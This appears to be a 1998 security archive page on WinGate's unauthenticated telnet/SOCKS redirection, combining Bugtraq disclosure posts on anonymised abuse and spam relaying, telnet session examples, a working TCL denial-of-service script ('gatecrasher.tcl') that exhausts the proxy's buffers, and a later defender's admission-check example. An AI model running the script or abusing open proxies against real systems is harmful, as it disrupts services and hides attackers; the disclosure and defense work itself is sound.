Wingate telnet redirection

| Summary | |
|---|---|
| Description: | A somewhat common technique for attackers is to install "telnet redirectors" on a system they have compromised. This allows them to telnet to the redirector and then telnet out from there anonymously, masking their true point of origin. These attackers no longer need to bother with penetrating systems, as Wingate includes anonymous telnet redirection as a feature enabled by default! Just telnet to port 1080 or 23 and then telnet right back out to wreak havoc on the Internet. And don't worry, it doesn't (by default) log anything! <sigh> |
| Author: | Alans other account <alanb@MANAWATU.GEN.NZ> |
| Compromise: | Intruders can mask their true point of origin by going through Wingate |
| Vulnerable Systems: | Windows boxes running Wingate |
| Date: | 11 February 1998 |
| Notes: | Many thanks to Dairo Bel <dairo@akrata.org> for translating his Spanish article on Wingate and sending it in! Also note that you can use nmap, a network port scanner I wrote, to locate hosts on your network that are running Wingate. |

Details
Date: Wed, 06 May 1998 22:37:04 +0300
From: Dairo Bel
To: fyodor@nmap.org
Subject: WinGate> Use and Abuse

Hi fyodor:

[cut]

-----------------------------cut here--------------------------------

Well, here I'm going to explain to all of you the amazing use that one Wingate could have. But... let's start at the beginning.

1.- Overview:

Imagine that we have 3 computers in our home, but we have only one modem. Of course, we would like to be able to access the Internet with the 3 computers, but there is an obvious problem: although these computers are connected in a net, only the one which has the modem can access the Internet. The way to be able to access with all of them is proxy software. A proxy (if somebody doesn't know it) is something like a footbridge, in the sense that you can jump to another place; in this case, the Internet. What it does is negotiate the different requests to go out which we make in our 3-computer net. Although only the first computer is connected to the Internet, the second and third can be connected through it.

2.- Software:

WinGate is Windows 95 or Windows NT software which negotiates the requests of our little net. The way to implement it is (like everything in Windows) very simple; it even has options by default. The other computers have internal IPs, which, when they go out of the little net, the Wingate changes to its own IP, so it seems that all the requests have been made by the same computer, when in fact it isn't true. The port opened by default is 1080.

3.- Description:

The footbridge which is used by our 3 computers should be closed to everybody who doesn't belong to our little net. That's why anyone can connect to our Wingate and leave with our IP address. The main bug is that the Wingate doesn't try to authenticate the user who is connecting to it.

The way this can occur is simply by making a telnet to the Wingate IP, and this will appear to us:

WinGate>

Then we can use it like a footbridge, because it thinks that the attacker is one of the internal net computers. It is enough to put the IP to which I want to connect, and from there it leaves to the Internet with the Wingate IP. For example, if our net is im.agoodboy.com, an attacker, for example im.abadguy.com, could do this:

im.abadguy.com$ telnet im.agoodboy.com
trying.. im.agoodboy.com
connected
WinGate>193.158.24.5
trying... 193.158.24.5
connected
System RH 4.2
login:

Etc. Well, what the attacker has done is connect from im.abadguy.com to the Wingate (our net), and through it to the 193.158.24.5 IP. The IP that 193.158.24.5 will receive will be the Wingate IP (our IP!), not the attacker's IP. That isn't the only thing that he could do. If he wants, he could do this through any other port, like ftp, mail, etc. From here we can deduce that we could be able to send *totally* anonymous mail, as if it were a remailer, or one of those old sendmails.

Another weakness in the Wingates is that if we know the IPs in the internal net, we can have total access without any problem. If the computers in the internal net are running under Windows, and I have installed Samba (to have access to the Wingate), we can connect directly to them. If the internal computers are running under some UNIX, we can telnet to them. Please think what could occur if the internal computers have a ++ in their .rhosts file to have simple access between them. The owner of the little net was thinking that he is safe from external attacks because he is protected by a proxy... when certainly he isn't.

If we put a Wingate as the server in our IRC client, we can send commands to another IRC server by virtue of /quote or /raw (depending on the client). It's possible to jump to another site in that manner too.

Another possible attack may occur if our little net has shared resources. In that case, the attacker could configure the Wingate as his default gateway. After that, he would be able to "see" all the computers in our network, because the Wingate thinks that he is one of them. In this manner, the Wingate turns into something like a router for the attacker. If he wanted, for example, he could put a sniffer on his own machine. All the information which leaves our network would pass first through the Wingate, and through the attacker after that...

One more possibility is to connect to a Wingate on port 808. If it's badly configured, two things may happen. The machine could crash, or we could enter directly into their internal net. This vulnerability doesn't always work, but sometimes it does. I can't determine why.

Finally, I'll only say that the Wingate doesn't keep *any* type of logs. If you connect to a Wingate, nobody will be able to know which IP connected to it. In Wingate versions 1.3 and 1.3*, the Wingate software DOESN'T keep logs, and there isn't any option to keep them. It's 100% anonymous. In version 2.0 there is an option, and if you activate it, the logs are kept. By default, that option isn't activated. About 80% of the companies which use Wingate have the 1.3 version of this software, so if anyone uses it in a malicious mode, he will be anonymous.

4.- Conclusions:

If we don't take care to remove all of the gateways which give access from the network and keep only the proxy, the Wingate software lets an attacker connect through it and camouflage himself in a perfectly anonymous mode. In the same way, under certain conditions, it is possible to have access to the computers in the internal network. This bug exists up to version 2.0 at least.

5.- Greetings:

To my loved girlfriend M.A., and to the man who gave me the idea to use a Wingate as a gateway.

dairo@akrata.org

If you want, you can use this PGP key to mail me:

-----------------------------cut here--------------------------------

Best Regards,
Dairo Bel
oOo !Hispahack Research Team oOo

Date: Wed, 11 Feb 1998 15:14:02 +1300
From: Alans other account <alanb@MANAWATU.GEN.NZ>
To: BUGTRAQ@NETSPACE.ORG
Subject: WIngate: the sequel

I've had a fair amount of mail following my posting about this to the list. What follows is a very brief summary.

1: Confirmation that a large number of sites have already experienced spammers SMTP relaying via insecure wingates. Numbers relayed have ranged from "a couple of thousand" to "over 20,000" messages.

2: Ditto on NNTP. This seems to be a favourite method for porn spammers in particular.

3: Ditto on IRC. I have a mIRC abuse script on hand which quite happily searches for wingates and attaches one floodbot per gateway. Tests have shown that upwards of 100 wingates can quite easily be used by a single attacker.

4: Open wingates are also wide open for any savvy attacker to attach to machines behind the wingate "firewall".

5: Although the primary attack method is to use SOCKS port 1080, the same techniques are easily used on port 23, so firewalling SOCKS is a temporary solution at best.

All of these are worrying, given the number of people who attack sites perceived as participating in spam.

There's a fairly good set of web pages on securing wingate at http://www.deerfield.com/wingate/secure-wingate.htm - this appears to be the Wingate home site.

The Undernet IRC network has had to temporarily lock out users from 2 large cable networks in Canada and the USA due to attacks against network admins. Those attacks were at one point coming from upwards of 200 different IPs and seemed to be driven by one individual. Given Wingate's lack of logging facilities, there is almost no hope of tracing attackers who initiate denial of service actions like this, so ISPs may well face having this kind of action taken against them by IRC (or other) networks in order to maintain usability of their systems. The end result is chaos on helpdesks.

Wingate's authors apparently are continuing to ignore the abuse issues associated with default settings. How long before they get the message?

AB
From carother@OU.EDU Wed May 13 00:48:32 1998
Date: Sat, 21 Feb 1998 04:38:56 -0600
From: Matt Carothers <carother@OU.EDU>
To: BUGTRAQ@NETSPACE.ORG
Subject: WinGate DoS
After a WinGate attack on our IRC channel, a friend of mine was toying around and discovered a fun bug:
$ telnet unsecured.wingate.com
Trying XXX.XX.XX.XXX...
Connected to XXX.XX.XX.XXX.
Escape character is '^]'.
WinGate>localhost
Connecting to host localhost...Connected
As you can see, the WinGate happily connects to itself. Do this enough times, and ...
WinGate>localhost
Connecting to host localhost...Out of buffers
At this point, the WinGate stops forwarding connections. Clients can still connect but cannot make use of it.
Below is a simple TCL exploit to demonstrate the idea.
- Matt
#!/usr/local/bin/tclsh
# gatecrasher.tcl
#
# This opens a WinGate and connects it to itself repeatedly until the
# target machine runs out of buffers and stops forwarding connections.
# The WinGate will not function as long as the script is running.
#
# Credit goes to Chris Snell <texan@hooked.net> for finding the bug.
#
# I apologize in advance for not being cool enough to script this in perl.
#
# - Matt Carothers <carother@ou.edu>

set host [lindex $argv 0];
set port [lindex $argv 1];

if {![string compare $host ""]} {
    set command [string range $argv0 [expr [string last / $argv0] + 1] end];
    puts stdout "Usage: $command <host> \[port\]";
    exit 1;
}

if {![string compare $port ""]} {
    set port 23;
}

if {[catch {set sock [socket $host $port]} stuff]} {
    # Could not connect for some reason. Output an error message and exit.
    puts stdout "$host:$port : $stuff";
    exit 1;
}

puts stdout "Connected to $host:$port. Launching WinGate kill ...";

set flag 0;
puts $sock "localhost";
flush $sock;

while {[gets $sock line] >= 0} {
    if {[string match "*Connected*" $line]} {
        # We've successfully connected the WinGate to itself.
        # Whee, let's do it again.
        puts $sock "localhost";
        flush $sock;
        puts -nonewline stdout ".";
        flush stdout;
        set flag 0;
    } elseif {[string match "*Out of buffers*" $line]} {
        # The WinGate is now out of buffers.
        # We'll output a message to that effect and keep trying. This
        # serves as a keep-alive and lets us jump in and fill any buffers
        # freed by clients which disconnect after the attack succeeds.
        if {!$flag} {
            puts stdout "\n*plink*"; set flag 1;
        }
        puts $sock "localhost";
        flush $sock;
    }
}

puts stdout "\nConnection lost.";
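As an added defender's example (not code from any of the posts above, nor from WinGate itself), here is the admission check a redirector should apply before a "WinGate>" request is forwarded: only clients on the internal net, never a connection back to itself (the self-connect loop behind "Out of buffers"), and an audit record for every decision, which is what versions 1.3 and 1.3* lacked entirely. The internal network, the gateway addresses and the offline resolver are constructed assumptions.

```python
import ipaddress
import socket
from datetime import datetime, timezone

# Constructed sample topology for this example (not from the original posts).
INTERNAL_NETS = [ipaddress.ip_network("192.168.1.0/24")]
GATEWAY_ADDRS = {ipaddress.ip_address("192.168.1.1"),     # inside interface
                 ipaddress.ip_address("203.0.113.10")}    # outside (modem) interface

AUDIT_LOG = []   # every decision lands here; WinGate 1.3 kept nothing at all


def evaluate_request(client_ip, target_host, resolve=socket.gethostbyname):
    """Decide whether a 'WinGate>' style redirect may be forwarded.

    Returns (allowed, reason). Three rules the default WinGate lacked:
      1. only clients on the internal net may use the redirector;
      2. the redirector never connects to itself (loopback or its own
         addresses), the self-connect loop behind 'Out of buffers';
      3. every decision is logged with client, target and outcome.
    """
    client = ipaddress.ip_address(client_ip)
    if not any(client in net for net in INTERNAL_NETS):
        return _decide(False, "client not on internal net", client_ip, target_host)
    try:
        target = ipaddress.ip_address(resolve(target_host))
    except (socket.gaierror, ValueError):
        return _decide(False, "target does not resolve", client_ip, target_host)
    if target.is_loopback or target in GATEWAY_ADDRS:
        return _decide(False, "target is the redirector itself", client_ip, target_host)
    return _decide(True, "forwarded", client_ip, target_host)


def _decide(allowed, reason, client_ip, target_host):
    """Record the decision (rule 3) and hand it back to the caller."""
    AUDIT_LOG.append({
        "time": datetime.now(timezone.utc).isoformat(timespec="seconds"),
        "client": client_ip, "target": target_host,
        "allowed": allowed, "reason": reason,
    })
    return allowed, reason


if __name__ == "__main__":
    # Constructed resolver so the demo runs offline.
    names = {"localhost": "127.0.0.1", "mail.example.org": "198.51.100.25"}
    lookup = lambda h: names.get(h, h)
    print(evaluate_request("203.0.113.7", "198.51.100.25", lookup))   # outsider
    print(evaluate_request("192.168.1.5", "localhost", lookup))       # self-connect
    print(evaluate_request("192.168.1.5", "mail.example.org", lookup))
    for entry in AUDIT_LOG:
        print(entry)
```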
This page is part of Fyodor's exploit world.